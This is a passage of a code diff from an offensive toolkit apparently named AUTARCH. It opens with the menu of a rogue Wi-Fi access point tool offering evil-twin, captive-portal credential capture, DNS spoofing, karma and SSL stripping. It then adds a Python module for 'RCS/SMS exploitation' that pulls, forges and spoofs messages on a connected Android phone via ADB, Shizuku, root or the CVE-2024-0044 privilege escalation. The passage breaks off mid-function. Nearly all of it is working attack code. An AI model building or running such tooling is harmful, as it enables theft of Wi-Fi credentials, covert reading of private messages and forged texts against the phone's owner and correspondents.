{ifc['name']} (mode={ifc['mode']}, ch={ifc['channel']})") + ssid = input(" SSID: ").strip() + iface = input(" Interface: ").strip() + ch = input(" Channel (default 6): ").strip() + enc = input(" Encryption (open/wpa2, default open): ").strip() or 'open' + pwd = '' + if enc in ('wpa', 'wpa2'): + pwd = input(" Password: ").strip() + inet = input(" Internet interface (blank=none): ").strip() or None + result = ap.start_rogue_ap( + ssid, iface, int(ch) if ch.isdigit() else 6, + enc, pwd, inet + ) + print(f" {result.get('message', result.get('error', 'Unknown'))}") + + elif choice == '2': + result = ap.stop_rogue_ap() + print(f" {result.get('message', result.get('error'))}") + + elif choice == '3': + target = input(" Target SSID: ").strip() + bssid = input(" Target BSSID: ").strip() + iface = input(" Interface: ").strip() + inet = input(" Internet interface (blank=none): ").strip() or None + result = ap.evil_twin(target, bssid, iface, inet) + print(f" {result.get('message', result.get('error'))}") + + elif choice == '4': + print(" Portal types: hotel_wifi, corporate, social_login, terms_accept") + ptype = input(" Portal type: ").strip() or 'hotel_wifi' + if ap._portal_active: + result = ap.stop_captive_portal() + else: + result = ap.start_captive_portal(ptype) + print(f" {result.get('message', result.get('error'))}") + + elif choice == '5': + clients = ap.get_clients() + if clients: + print(f" Connected clients ({len(clients)}):") + for c in clients: + print(f" {c['mac']} {c['ip']:<15} {c['hostname']:<20} {c['os']}") + else: + print(" No connected clients") + + elif choice == '6': + if ap._dns_spoof_active: + result = ap.disable_dns_spoof() + else: + spoofs = {} + while True: + domain = input(" Domain (blank to finish): ").strip() + if not domain: + break + ip = input(f" IP for {domain}: ").strip() + if ip: + spoofs[domain] = ip + if spoofs: + result = ap.enable_dns_spoof(spoofs) + else: + result = {'ok': False, 'error': 'No spoofs entered'} + print(f" 
{result.get('message', result.get('error'))}") + + elif choice == '7': + if ap._karma_active: + result = ap.disable_karma() + else: + iface = input(" Interface (blank=AP interface): ").strip() or None + result = ap.enable_karma(iface) + print(f" {result.get('message', result.get('error'))}") + + elif choice == '8': + if ap._sslstrip_active: + result = ap.disable_ssl_strip() + else: + result = ap.enable_ssl_strip() + print(f" {result.get('message', result.get('error'))}") + + elif choice == '9': + captures = ap.get_portal_captures() + if captures: + print(f" Captured credentials ({len(captures)}):") + for c in captures: + print(f" [{c['timestamp'][:19]}] user={c['username']} " + f"pass={c['password']} ip={c['ip']}") + else: + print(" No captures yet") + + elif choice == '10': + stats = ap.get_traffic_stats() + if stats['top_domains']: + print(" Top domains:") + for d in stats['top_domains'][:10]: + print(f" {d['domain']:<40} {d['queries']} queries") + else: + print(" No traffic data") + + elif choice == '11': + for tool, avail in tools.items(): + status_str = 'OK' if avail else 'MISSING' + print(f" {tool:<15} {status_str}") diff --git a/modules/rcs_tools.py b/modules/rcs_tools.py new file mode 100644 index 0000000..0f42c37 --- /dev/null +++ b/modules/rcs_tools.py @@ -0,0 +1,1969 @@ +"""AUTARCH RCS/SMS Exploitation v2.0 + +Comprehensive RCS/SMS message extraction, forging, modification, and exploitation +on connected Android devices via ADB content provider commands, Shizuku shell +access, CVE-2024-0044 privilege escalation, AOSP RCS provider queries, and +Archon app integration. + +All operations execute on the target phone — nothing runs locally except +command dispatch and output parsing. Messages in bugle_db are stored as +PLAINTEXT after E2EE decryption, so no key extraction is needed for reading. + +Exploitation paths (in order of preference): + 1. Content providers (UID 2000 / shell — no root needed) + 2. 
Archon app relay (READ_SMS + Shizuku → bugle_db access) + 3. CVE-2024-0044 (Android 12-13 pre-Oct 2024 — full app-UID access) + 4. ADB backup (deprecated on Android 12+ but works on some devices) + 5. Root (if available) +""" + +DESCRIPTION = "RCS/SMS Exploitation — Database extraction, forging, backup & spoofing" +AUTHOR = "AUTARCH" +VERSION = "2.0" +CATEGORY = "offense" + +import os +import re +import csv +import json +import time +import shlex +import struct +import sqlite3 +import subprocess +import threading +import zlib +from io import StringIO +from pathlib import Path +from datetime import datetime, timezone, timedelta +from typing import Dict, List, Optional, Any, Tuple +from xml.etree import ElementTree as ET + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + import shutil as _sh + + def find_tool(name): + return _sh.which(name) + + def get_data_dir(): + return Path(__file__).resolve().parent.parent / 'data' + + +# ── Module-level singleton ────────────────────────────────────────────────── + +_instance: Optional['RCSTools'] = None + + +def get_rcs_tools() -> 'RCSTools': + global _instance + if _instance is None: + _instance = RCSTools() + return _instance + + +# ── Constants ──────────────────────────────────────────────────────────────── + +# Standard Android telephony content providers (accessible at UID 2000) +SMS_URI = 'content://sms/' +SMS_INBOX_URI = 'content://sms/inbox' +SMS_SENT_URI = 'content://sms/sent' +SMS_DRAFT_URI = 'content://sms/draft' +SMS_OUTBOX_URI = 'content://sms/outbox' +MMS_URI = 'content://mms/' +MMS_INBOX_URI = 'content://mms/inbox' +MMS_SENT_URI = 'content://mms/sent' +MMS_PART_URI = 'content://mms/part' +MMS_SMS_CONVERSATIONS_URI = 'content://mms-sms/conversations' +MMS_SMS_DRAFT_URI = 'content://mms-sms/draft' +MMS_SMS_UNDELIVERED_URI = 'content://mms-sms/undelivered' +MMS_SMS_LOCKED_URI = 'content://mms-sms/locked' + +# AOSP RCS content provider (authority: "rcs") +RCS_THREAD_URI = 
'content://rcs/thread' +RCS_P2P_THREAD_URI = 'content://rcs/p2p_thread' +RCS_GROUP_THREAD_URI = 'content://rcs/group_thread' +RCS_PARTICIPANT_URI = 'content://rcs/participant' +RCS_MESSAGE_URI_FMT = 'content://rcs/p2p_thread/{thread_id}/message' +RCS_FILE_TRANSFER_URI_FMT = 'content://rcs/p2p_thread/{thread_id}/file_transfer' +RCS_INCOMING_MSG_URI_FMT = 'content://rcs/p2p_thread/{thread_id}/incoming_message' +RCS_OUTGOING_MSG_URI_FMT = 'content://rcs/p2p_thread/{thread_id}/outgoing_message' + +# Google Messages proprietary providers (may require elevated access) +GMSGS_PROVIDER = 'content://com.google.android.apps.messaging.datamodel.MessagingContentProvider' + +# All known RCS-related content provider URIs to enumerate +ALL_RCS_URIS = [ + 'content://rcs/thread', + 'content://rcs/p2p_thread', + 'content://rcs/group_thread', + 'content://rcs/participant', + 'content://im/messages/', + 'content://com.google.android.apps.messaging/messages', + 'content://com.google.android.apps.messaging.datamodel.MessagingContentProvider', + 'content://com.google.android.ims.provider/', + 'content://com.google.android.gms.ims.provider/', + 'content://com.google.android.rcs.provider/', + 'content://com.samsung.android.messaging/', + 'content://com.samsung.rcs.autoconfigurationprovider/root/*', +] + +# SMS type codes (android.provider.Telephony.Sms constants) +MSG_TYPE_ALL = 0 +MSG_TYPE_INBOX = 1 # received +MSG_TYPE_SENT = 2 # sent +MSG_TYPE_DRAFT = 3 +MSG_TYPE_OUTBOX = 4 +MSG_TYPE_FAILED = 5 +MSG_TYPE_QUEUED = 6 + +# MMS message box codes +MMS_BOX_INBOX = 1 +MMS_BOX_SENT = 2 +MMS_BOX_DRAFT = 3 +MMS_BOX_OUTBOX = 4 + +# bugle_db message_protocol values +PROTOCOL_SMS = 0 +PROTOCOL_MMS = 1 +PROTOCOL_RCS = 2 # Google proprietary — values >= 2 indicate RCS + +# bugle_db paths on device +BUGLE_DB_PATHS = [ + '/data/data/com.google.android.apps.messaging/databases/bugle_db', + '/data/user/0/com.google.android.apps.messaging/databases/bugle_db', + 
'/data/data/com.android.messaging/databases/bugle_db', +] + +# Telephony provider database +MMSSMS_DB_PATHS = [ + '/data/data/com.android.providers.telephony/databases/mmssms.db', + '/data/user_de/0/com.android.providers.telephony/databases/mmssms.db', +] + +# Samsung messaging databases +SAMSUNG_DB_PATHS = [ + '/data/data/com.samsung.android.messaging/databases/', + '/data/data/com.sec.android.provider.logsprovider/databases/logs.db', +] + +# Known messaging packages +MESSAGING_PACKAGES = [ + 'com.google.android.apps.messaging', # Google Messages + 'com.android.messaging', # AOSP Messages + 'com.samsung.android.messaging', # Samsung Messages + 'com.verizon.messaging.vzmsgs', # Verizon Message+ +] + +# Column projections +SMS_COLUMNS = '_id:thread_id:address:body:date:date_sent:type:read:status:protocol:service_center:person:subject:locked:seen' +MMS_COLUMNS = '_id:thread_id:date:msg_box:sub:sub_cs:ct_l:exp:m_type:read:seen:st' +MMS_PART_COLUMNS = '_id:mid:ct:text:_data:name' + +# Known CVEs affecting RCS/Android messaging +RCS_CVES = { + 'CVE-2023-24033': { + 'severity': 'critical', 'cvss': 9.8, + 'desc': 'Samsung Exynos baseband RCE via RCS SDP accept-type parsing', + 'affected': 'Exynos 5123, 5300, 980, 1080, Auto T5123', + 'type': 'zero-click', 'discoverer': 'Google Project Zero', + 'mitigation': 'Disable Wi-Fi calling and VoLTE; apply March 2023 patches', + }, + 'CVE-2024-0044': { + 'severity': 'high', 'cvss': 7.8, + 'desc': 'Android run-as privilege escalation via newline injection in PackageInstallerService', + 'affected': 'Android 12-13 pre-October 2024 security patch', + 'type': 'local', 'discoverer': 'Meta Red Team X', + 'mitigation': 'Apply October 2024 security patch', + 'exploit_available': True, + }, + 'CVE-2024-31317': { + 'severity': 'high', 'cvss': 7.8, + 'desc': 'Android system_server run-as bypass via command injection', + 'affected': 'Android 12-14 pre-QPR2', + 'type': 'local', 'discoverer': 'Meta Red Team X', + 'mitigation': 'Apply June 2024 
security patch', + }, + 'CVE-2024-49415': { + 'severity': 'high', 'cvss': 8.1, + 'desc': 'Samsung libsaped.so zero-click RCE via RCS audio message (OOB write in APE decoder)', + 'affected': 'Samsung Galaxy S23/S24 Android 12-14 pre-December 2024', + 'type': 'zero-click', 'discoverer': 'Natalie Silvanovich (Project Zero)', + 'mitigation': 'Apply December 2024 Samsung security patch', + }, + 'CVE-2025-48593': { + 'severity': 'critical', 'cvss': 9.8, + 'desc': 'Android System component zero-click RCE', + 'affected': 'Android 13, 14, 15, 16', + 'type': 'zero-click', 'discoverer': 'Android Security Team', + 'mitigation': 'Apply November 2025 security patch', + }, + 'CVE-2017-0780': { + 'severity': 'medium', 'cvss': 5.5, + 'desc': 'Android Messages crash via crafted message (DoS)', + 'affected': 'Android 4.4-8.0', + 'type': 'remote', 'discoverer': 'Trend Micro', + 'mitigation': 'Update to patched Android version', + }, +} + +# Phenotype flags for Google Messages debug/verbose logging +PHENOTYPE_FLAGS = { + 'verbose_bug_reports': 'bugle_phenotype__enable_verbose_bug_reports', + 'rcs_diagnostics': 'bugle_phenotype__enable_rcs_diagnostics', + 'debug_mode': 'bugle_phenotype__enable_debug_mode', +} + +# Enterprise archival broadcast +ARCHIVAL_BROADCAST_ACTION = 'GOOGLE_MESSAGES_ARCHIVAL_UPDATE' +ARCHIVAL_URI_EXTRA = 'com.google.android.apps.messaging.EXTRA_ARCHIVAL_URI' + + +# ── RCSTools Class ─────────────────────────────────────────────────────────── + +class RCSTools: + """Comprehensive RCS/SMS exploitation via ADB.""" + + def __init__(self): + self._adb_path: Optional[str] = None + self._data_dir: Path = Path(get_data_dir()) / 'rcs_tools' + self._data_dir.mkdir(parents=True, exist_ok=True) + self._backups_dir: Path = self._data_dir / 'backups' + self._backups_dir.mkdir(parents=True, exist_ok=True) + self._exports_dir: Path = self._data_dir / 'exports' + self._exports_dir.mkdir(parents=True, exist_ok=True) + self._extracted_dir: Path = self._data_dir / 'extracted_dbs' + 
self._extracted_dir.mkdir(parents=True, exist_ok=True) + self._monitor_thread: Optional[threading.Thread] = None + self._monitor_running = False + self._intercepted: List[Dict[str, Any]] = [] + self._intercepted_lock = threading.Lock() + self._forged_log: List[Dict[str, Any]] = [] + self._cve_exploit_active = False + self._exploit_victim_name: Optional[str] = None + + # ══════════════════════════════════════════════════════════════════════ + # §1 ADB HELPERS + # ══════════════════════════════════════════════════════════════════════ + + def _get_adb(self) -> str: + if self._adb_path is None: + self._adb_path = find_tool('adb') + if not self._adb_path: + raise RuntimeError('adb not found') + return self._adb_path + + def _run_adb(self, command: str, timeout: int = 30) -> str: + adb = self._get_adb() + full_cmd = f'{adb} {command}' + try: + result = subprocess.run( + full_cmd, shell=True, capture_output=True, text=True, timeout=timeout, + ) + if result.returncode != 0 and result.stderr.strip(): + return f'[adb error] {result.stderr.strip()}' + return result.stdout.strip() + except subprocess.TimeoutExpired: + return f'[adb error] Command timed out after {timeout}s' + except Exception as e: + return f'[adb error] {e}' + + def _run_adb_binary(self, command: str, timeout: int = 60) -> Optional[bytes]: + adb = self._get_adb() + full_cmd = f'{adb} {command}' + try: + result = subprocess.run( + full_cmd, shell=True, capture_output=True, timeout=timeout, + ) + if result.returncode != 0: + return None + return result.stdout + except Exception: + return None + + def _run_shizuku(self, command: str, timeout: int = 30) -> str: + escaped = command.replace("'", "'\\''") + return self._run_adb(f"shell sh -c '{escaped}'", timeout=timeout) + + def _shell(self, command: str, timeout: int = 30) -> str: + return self._run_adb(f'shell {command}', timeout=timeout) + + def _content_query(self, uri: str, projection: str = '', where: str = '', + sort: str = '', limit: int = 0) -> 
List[Dict[str, str]]: + cmd = f'shell content query --uri {uri}' + if projection: + cmd += f' --projection {projection}' + if where: + cmd += f' --where "{where}"' + if sort: + cmd += f' --sort "{sort}"' + output = self._run_adb(cmd, timeout=30) + rows = self._parse_content_query(output) + if limit > 0: + rows = rows[:limit] + return rows + + def _content_insert(self, uri: str, bindings: Dict[str, Any]) -> str: + cmd = f'shell content insert --uri {uri}' + for key, val in bindings.items(): + if val is None: + cmd += f' --bind {key}:s:NULL' + elif isinstance(val, int): + cmd += f' --bind {key}:i:{val}' + elif isinstance(val, float): + cmd += f' --bind {key}:f:{val}' + else: + safe = str(val).replace("'", "'\\''") + cmd += f" --bind {key}:s:'{safe}'" + return self._run_adb(cmd) + + def _content_update(self, uri: str, bindings: Dict[str, Any], where: str = '') -> str: + cmd = f'shell content update --uri {uri}' + for key, val in bindings.items(): + if val is None: + cmd += f' --bind {key}:s:NULL' + elif isinstance(val, int): + cmd += f' --bind {key}:i:{val}' + else: + safe = str(val).replace("'", "'\\''") + cmd += f" --bind {key}:s:'{safe}'" + if where: + cmd += f' --where "{where}"' + return self._run_adb(cmd) + + def _content_delete(self, uri: str, where: str = '') -> str: + cmd = f'shell content delete --uri {uri}' + if where: + cmd += f' --where "{where}"' + return self._run_adb(cmd) + + def _parse_content_query(self, output: str) -> List[Dict[str, str]]: + rows = [] + if not output or output.startswith('[adb error]'): + return rows + for line in output.splitlines(): + line = line.strip() + if not line.startswith('Row:'): + continue + match = re.match(r'Row:\s*\d+\s+(.*)', line) + if not match: + continue + payload = match.group(1) + row = {} + parts = re.split(r',\s+(?=[a-zA-Z_]+=)', payload) + for part in parts: + eq_pos = part.find('=') + if eq_pos == -1: + continue + key = part[:eq_pos].strip() + val = part[eq_pos + 1:].strip() + if val == 'NULL': + val = None 
+ row[key] = val + if row: + rows.append(row) + return rows + + def _is_error(self, output: str) -> bool: + return output.startswith('[adb error]') if output else True + + def _ts_ms(self, dt: Optional[datetime] = None) -> int: + if dt is None: + dt = datetime.now(timezone.utc) + return int(dt.timestamp() * 1000) + + def _format_ts(self, ts_ms) -> str: + try: + ts = int(ts_ms) / 1000 + return datetime.fromtimestamp(ts, tz=timezone.utc).strftime('%Y-%m-%d %H:%M:%S UTC') + except (ValueError, TypeError, OSError): + return str(ts_ms) + + # ══════════════════════════════════════════════════════════════════════ + # §2 DEVICE CONNECTION & STATUS + # ══════════════════════════════════════════════════════════════════════ + + def get_connected_device(self) -> Dict[str, Any]: + output = self._run_adb('devices') + devices = [] + for line in output.splitlines(): + line = line.strip() + if line and not line.startswith('List') and not line.startswith('*'): + parts = line.split('\t') + if len(parts) >= 2: + devices.append({'serial': parts[0], 'state': parts[1]}) + if not devices: + return {'connected': False, 'error': 'No devices connected'} + for d in devices: + if d['state'] == 'device': + return {'connected': True, 'serial': d['serial'], 'state': 'device'} + return {'connected': False, 'error': f'Device state: {devices[0]["state"]}'} + + def get_device_info(self) -> Dict[str, Any]: + dev = self.get_connected_device() + if not dev.get('connected'): + return dev + info = { + 'connected': True, + 'serial': dev['serial'], + 'model': self._shell('getprop ro.product.model'), + 'manufacturer': self._shell('getprop ro.product.manufacturer'), + 'android_version': self._shell('getprop ro.build.version.release'), + 'sdk_version': self._shell('getprop ro.build.version.sdk'), + 'security_patch': self._shell('getprop ro.build.version.security_patch'), + 'build_id': self._shell('getprop ro.build.display.id'), + 'brand': self._shell('getprop ro.product.brand'), + 'device': 
self._shell('getprop ro.product.device'), + 'is_pixel': 'pixel' in self._shell('getprop ro.product.brand').lower() + or 'google' in self._shell('getprop ro.product.manufacturer').lower(), + 'is_samsung': 'samsung' in self._shell('getprop ro.product.manufacturer').lower(), + } + # Check default SMS app + sms_app = self._shell('settings get secure sms_default_application') + info['default_sms_app'] = sms_app if not self._is_error(sms_app) else 'unknown' + return info + + def get_status(self) -> Dict[str, Any]: + dev = self.get_device_info() + if not dev.get('connected'): + return {'ok': False, 'connected': False, 'error': dev.get('error', 'Not connected')} + # Check Shizuku + shizuku = self.check_shizuku_status() + # Check Archon + archon = self.check_archon_installed() + # Check CVE vulnerability + cve_status = self.check_cve_2024_0044() + return { + 'ok': True, + 'connected': True, + 'device': dev, + 'shizuku': shizuku, + 'archon': archon, + 'cve_2024_0044': cve_status, + 'exploit_active': self._cve_exploit_active, + 'monitor_running': self._monitor_running, + 'intercepted_count': len(self._intercepted), + 'forged_count': len(self._forged_log), + } + + def check_shizuku_status(self) -> Dict[str, Any]: + # Check if Shizuku is installed + pm_output = self._shell('pm list packages moe.shizuku.privileged.api') + installed = 'moe.shizuku.privileged.api' in pm_output if not self._is_error(pm_output) else False + if not installed: + pm_output = self._shell('pm list packages rikka.shizuku') + installed = 'rikka.shizuku' in pm_output if not self._is_error(pm_output) else False + # Check if Shizuku service is running + running = False + if installed: + ps_out = self._shell('ps -A | grep shizuku') + running = bool(ps_out and not self._is_error(ps_out) and 'shizuku' in ps_out.lower()) + return {'installed': installed, 'running': running, 'uid': 2000 if running else None} + + def check_archon_installed(self) -> Dict[str, Any]: + pm_output = self._shell('pm list packages 
com.darkhal.archon') + installed = 'com.darkhal.archon' in pm_output if not self._is_error(pm_output) else False + result = {'installed': installed} + if installed: + # Check version + dump = self._shell('dumpsys package com.darkhal.archon | grep versionName') + if dump and not self._is_error(dump): + m = re.search(r'versionName=(\S+)', dump) + if m: + result['version'] = m.group(1) + # Check if Archon has messaging/RCS permissions + perms = self._shell('dumpsys package com.darkhal.archon | grep "android.permission.READ_SMS"') + result['has_sms_permission'] = 'granted=true' in perms if perms else False + perms2 = self._shell('dumpsys package com.darkhal.archon | grep "android.permission.READ_CONTACTS"') + result['has_contacts_permission'] = 'granted=true' in perms2 if perms2 else False + return result + + def get_security_patch_level(self) -> Dict[str, Any]: + patch = self._shell('getprop ro.build.version.security_patch') + android_ver = self._shell('getprop ro.build.version.release') + sdk = self._shell('getprop ro.build.version.sdk') + result = { + 'security_patch': patch, + 'android_version': android_ver, + 'sdk_version': sdk, + } + # Check if CVE-2024-0044 is exploitable + try: + sdk_int = int(sdk) + if sdk_int in (31, 32, 33): # Android 12, 12L, 13 + if patch and patch < '2024-10-01': + result['cve_2024_0044_vulnerable'] = True + else: + result['cve_2024_0044_vulnerable'] = False + else: + result['cve_2024_0044_vulnerable'] = False + except (ValueError, TypeError): + result['cve_2024_0044_vulnerable'] = False + return result + + def get_default_sms_app(self) -> Dict[str, Any]: + app = self._shell('settings get secure sms_default_application') + if self._is_error(app): + return {'ok': False, 'error': app} + return {'ok': True, 'package': app} + + def set_default_sms_app(self, package: str) -> Dict[str, Any]: + # Verify package exists + pm = self._shell(f'pm list packages {shlex.quote(package)}') + if package not in pm: + return {'ok': False, 'error': f'Package 
{package} not found'} + result = self._shell(f'settings put secure sms_default_application {shlex.quote(package)}') + if self._is_error(result) and result: + return {'ok': False, 'error': result} + return {'ok': True, 'message': f'Default SMS app set to {package}'} + + # ══════════════════════════════════════════════════════════════════════ + # §3 IMS/RCS DIAGNOSTICS + # ══════════════════════════════════════════════════════════════════════ + + def get_ims_status(self) -> Dict[str, Any]: + output = self._shell('dumpsys telephony_ims') + if self._is_error(output): + # Try alternate service name + output = self._shell('dumpsys telephony.registry') + if self._is_error(output): + return {'ok': False, 'error': 'Cannot query IMS status'} + lines = output.splitlines() + result = {'ok': True, 'raw': output[:5000]} + for line in lines: + line_l = line.strip().lower() + if 'registered' in line_l and 'ims' in line_l: + result['ims_registered'] = 'true' in line_l or 'yes' in line_l + if 'rcs' in line_l and ('enabled' in line_l or 'connected' in line_l): + result['rcs_enabled'] = True + if 'volte' in line_l and 'enabled' in line_l: + result['volte_enabled'] = True + return result + + def get_carrier_config(self) -> Dict[str, Any]: + output = self._shell('dumpsys carrier_config') + if self._is_error(output): + return {'ok': False, 'error': output} + rcs_keys = {} + for line in output.splitlines(): + line = line.strip() + if any(k in line.lower() for k in ['rcs', 'ims', 'uce', 'presence', 'single_registration']): + if '=' in line: + key, _, val = line.partition('=') + rcs_keys[key.strip()] = val.strip() + return {'ok': True, 'rcs_config': rcs_keys, 'raw_length': len(output)} + + def get_rcs_registration_state(self) -> Dict[str, Any]: + # Check Google Messages RCS state via dumpsys + output = self._shell('dumpsys activity service com.google.android.apps.messaging') + rcs_state = 'unknown' + if output and not self._is_error(output): + for line in output.splitlines(): + if 'rcs' in 
line.lower() and ('state' in line.lower() or 'connected' in line.lower()): + rcs_state = line.strip() + break + # Also try carrier_services + cs_output = self._shell('dumpsys activity service com.google.android.ims') + cs_state = 'unknown' + if cs_output and not self._is_error(cs_output): + for line in cs_output.splitlines(): + if 'provisioned' in line.lower() or 'registered' in line.lower(): + cs_state = line.strip() + break + return { + 'ok': True, + 'messages_rcs_state': rcs_state, + 'carrier_services_state': cs_state, + } + + def enable_verbose_logging(self) -> Dict[str, Any]: + results = {} + # Set Phenotype flag for verbose bug reports (no root needed) + for name, flag in PHENOTYPE_FLAGS.items(): + cmd = ( + f'shell am broadcast ' + f"-a 'com.google.android.gms.phenotype.FLAG_OVERRIDE' " + f'--es package "com.google.android.apps.messaging#com.google.android.apps.messaging" ' + f'--es user "\\*" ' + f'--esa flags "{flag}" ' + f'--esa values "true" ' + f'--esa types "boolean" ' + f'com.google.android.gms' + ) + out = self._run_adb(cmd) + results[name] = 'success' if 'Broadcast completed' in out else out + # Try setting log tags (may require root) + log_tags = ['Bugle', 'BugleDataModel', 'BugleRcs', 'BugleRcsEngine', + 'RcsProvisioning', 'CarrierServices', 'BugleTransport'] + for tag in log_tags: + self._shell(f'setprop log.tag.{tag} VERBOSE') + results['log_tags'] = 'attempted (may require root)' + return {'ok': True, 'results': results} + + def capture_rcs_logs(self, duration: int = 10) -> Dict[str, Any]: + # Clear logcat first + self._shell('logcat -c') + # Capture filtered logs + tags = 'Bugle:V BugleRcs:V RcsProvisioning:V CarrierServices:V BugleRcsEngine:V *:S' + output = self._run_adb(f'shell logcat -d -s {tags}', timeout=duration + 5) + if self._is_error(output): + return {'ok': False, 'error': output} + lines = output.splitlines() + return {'ok': True, 'lines': lines[:500], 'total_lines': len(lines)} + + # 
══════════════════════════════════════════════════════════════════════ + # §4 CONTENT PROVIDER EXTRACTION (no root needed) + # ══════════════════════════════════════════════════════════════════════ + + def read_sms_database(self, limit: int = 200) -> List[Dict[str, Any]]: + rows = self._content_query(SMS_URI, projection=SMS_COLUMNS, limit=limit) + for row in rows: + if row.get('date'): + row['date_formatted'] = self._format_ts(row['date']) + row['protocol_name'] = 'SMS' + msg_type = int(row.get('type', 0)) + row['direction'] = 'incoming' if msg_type == MSG_TYPE_INBOX else 'outgoing' + return rows + + def read_sms_inbox(self, limit: int = 100) -> List[Dict[str, Any]]: + return self._content_query(SMS_INBOX_URI, projection=SMS_COLUMNS, limit=limit) + + def read_sms_sent(self, limit: int = 100) -> List[Dict[str, Any]]: + return self._content_query(SMS_SENT_URI, projection=SMS_COLUMNS, limit=limit) + + def read_mms_database(self, limit: int = 100) -> List[Dict[str, Any]]: + rows = self._content_query(MMS_URI, projection=MMS_COLUMNS, limit=limit) + # Enrich with parts (body text) + for row in rows: + mms_id = row.get('_id') + if mms_id: + parts = self._content_query( + f'content://mms/{mms_id}/part', + projection=MMS_PART_COLUMNS, + ) + row['parts'] = parts + # Extract text body from parts + for p in parts: + if p.get('ct') == 'text/plain' and p.get('text'): + row['body'] = p['text'] + break + if row.get('date'): + row['date_formatted'] = self._format_ts(int(row['date']) * 1000) + return rows + + def read_conversations(self, limit: int = 100) -> List[Dict[str, Any]]: + rows = self._content_query(MMS_SMS_CONVERSATIONS_URI, limit=limit) + return rows + + def read_draft_messages(self) -> List[Dict[str, Any]]: + return self._content_query(MMS_SMS_DRAFT_URI) + + def read_undelivered_messages(self) -> List[Dict[str, Any]]: + return self._content_query(MMS_SMS_UNDELIVERED_URI) + + def read_locked_messages(self) -> List[Dict[str, Any]]: + return 
self._content_query(MMS_SMS_LOCKED_URI) + + def read_rcs_provider(self) -> Dict[str, Any]: + """Query the AOSP RCS content provider (content://rcs/).""" + results = {} + # Threads + threads = self._content_query(RCS_THREAD_URI) + results['threads'] = threads + results['thread_count'] = len(threads) + # P2P threads + p2p = self._content_query(RCS_P2P_THREAD_URI) + results['p2p_threads'] = p2p + # Group threads + groups = self._content_query(RCS_GROUP_THREAD_URI) + results['group_threads'] = groups + # Participants + participants = self._content_query(RCS_PARTICIPANT_URI) + results['participants'] = participants + results['ok'] = True + return results + + def read_rcs_messages(self, thread_id: Optional[int] = None) -> List[Dict[str, Any]]: + """Read RCS messages from AOSP RCS provider.""" + if thread_id: + uri = RCS_MESSAGE_URI_FMT.format(thread_id=thread_id) + else: + # Try querying all threads and getting messages from each + threads = self._content_query(RCS_THREAD_URI) + all_msgs = [] + for t in threads: + tid = t.get('rcs_thread_id') + if tid: + msgs = self._content_query( + RCS_MESSAGE_URI_FMT.format(thread_id=tid) + ) + for m in msgs: + m['thread_id'] = tid + all_msgs.extend(msgs) + return all_msgs + return self._content_query(uri) + + def read_rcs_participants(self) -> List[Dict[str, Any]]: + return self._content_query(RCS_PARTICIPANT_URI) + + def read_rcs_file_transfers(self, thread_id: int) -> List[Dict[str, Any]]: + uri = RCS_FILE_TRANSFER_URI_FMT.format(thread_id=thread_id) + return self._content_query(uri) + + def get_thread_messages(self, thread_id: int, limit: int = 200) -> List[Dict[str, Any]]: + rows = self._content_query( + SMS_URI, projection=SMS_COLUMNS, + where=f'thread_id={thread_id}', + limit=limit, + ) + for row in rows: + if row.get('date'): + row['date_formatted'] = self._format_ts(row['date']) + return rows + + def get_messages_by_address(self, address: str, limit: int = 200) -> List[Dict[str, Any]]: + safe_addr = address.replace("'", "''") 
+ rows = self._content_query( + SMS_URI, projection=SMS_COLUMNS, + where=f"address='{safe_addr}'", + limit=limit, + ) + for row in rows: + if row.get('date'): + row['date_formatted'] = self._format_ts(row['date']) + return rows + + def search_messages(self, keyword: str, limit: int = 100) -> List[Dict[str, Any]]: + safe_kw = keyword.replace("'", "''").replace('%', '\\%') + rows = self._content_query( + SMS_URI, projection=SMS_COLUMNS, + where=f"body LIKE '%{safe_kw}%'", + limit=limit, + ) + for row in rows: + if row.get('date'): + row['date_formatted'] = self._format_ts(row['date']) + return rows + + def enumerate_providers(self) -> Dict[str, Any]: + """Scan all known messaging content providers and report which are accessible.""" + accessible = [] + blocked = [] + for uri in ALL_RCS_URIS: + out = self._run_adb(f'shell content query --uri {uri}', timeout=5) + if self._is_error(out) or 'Permission Denial' in out or 'SecurityException' in out: + blocked.append({'uri': uri, 'error': out[:200] if out else 'no response'}) + elif 'No result found' in out: + accessible.append({'uri': uri, 'status': 'accessible', 'rows': 0}) + else: + row_count = out.count('Row:') + accessible.append({'uri': uri, 'status': 'has_data', 'rows': row_count}) + # Also check standard SMS/MMS + for uri_name, uri in [('SMS', SMS_URI), ('MMS', MMS_URI), ('Conversations', MMS_SMS_CONVERSATIONS_URI)]: + out = self._run_adb(f'shell content query --uri {uri}', timeout=5) + if not self._is_error(out) and 'Permission' not in out: + row_count = out.count('Row:') + accessible.append({'uri': uri, 'status': 'has_data', 'rows': row_count, 'name': uri_name}) + return { + 'ok': True, + 'accessible': accessible, + 'blocked': blocked, + 'total_accessible': len(accessible), + 'total_blocked': len(blocked), + } + + # ══════════════════════════════════════════════════════════════════════ + # §5 BUGLE_DB DIRECT EXTRACTION + # ══════════════════════════════════════════════════════════════════════ + + def 
extract_bugle_db(self) -> Dict[str, Any]: + """Extract Google Messages bugle_db using best available method. + + Messages are stored as PLAINTEXT in bugle_db — no decryption needed. + The WAL file (bugle_db-wal) may contain recent messages not yet + checkpointed to the main database, so we always capture it. + """ + dev = self.get_connected_device() + if not dev.get('connected'): + return {'ok': False, 'error': 'No device connected'} + + timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') + extract_dir = self._extracted_dir / timestamp + extract_dir.mkdir(parents=True, exist_ok=True) + + # Method 1: Try Archon app relay (if installed and has permissions) + archon = self.check_archon_installed() + if archon.get('installed') and archon.get('has_sms_permission'): + result = self._extract_via_archon(extract_dir) + if result.get('ok'): + return result + + # Method 2: Try CVE-2024-0044 (if vulnerable) + cve = self.check_cve_2024_0044() + if cve.get('vulnerable'): + result = self._extract_via_cve(extract_dir) + if result.get('ok'): + return result + + # Method 3: Try root direct pull + root_check = self._shell('id') + if 'uid=0' in root_check: + result = self._extract_via_root(extract_dir) + if result.get('ok'): + return result + + # Method 4: Try adb backup + result = self._extract_via_adb_backup(extract_dir) + if result.get('ok'): + return result + + # Method 5: Content provider fallback (SMS/MMS only, not full bugle_db) + return { + 'ok': False, + 'error': 'Cannot extract bugle_db directly. 
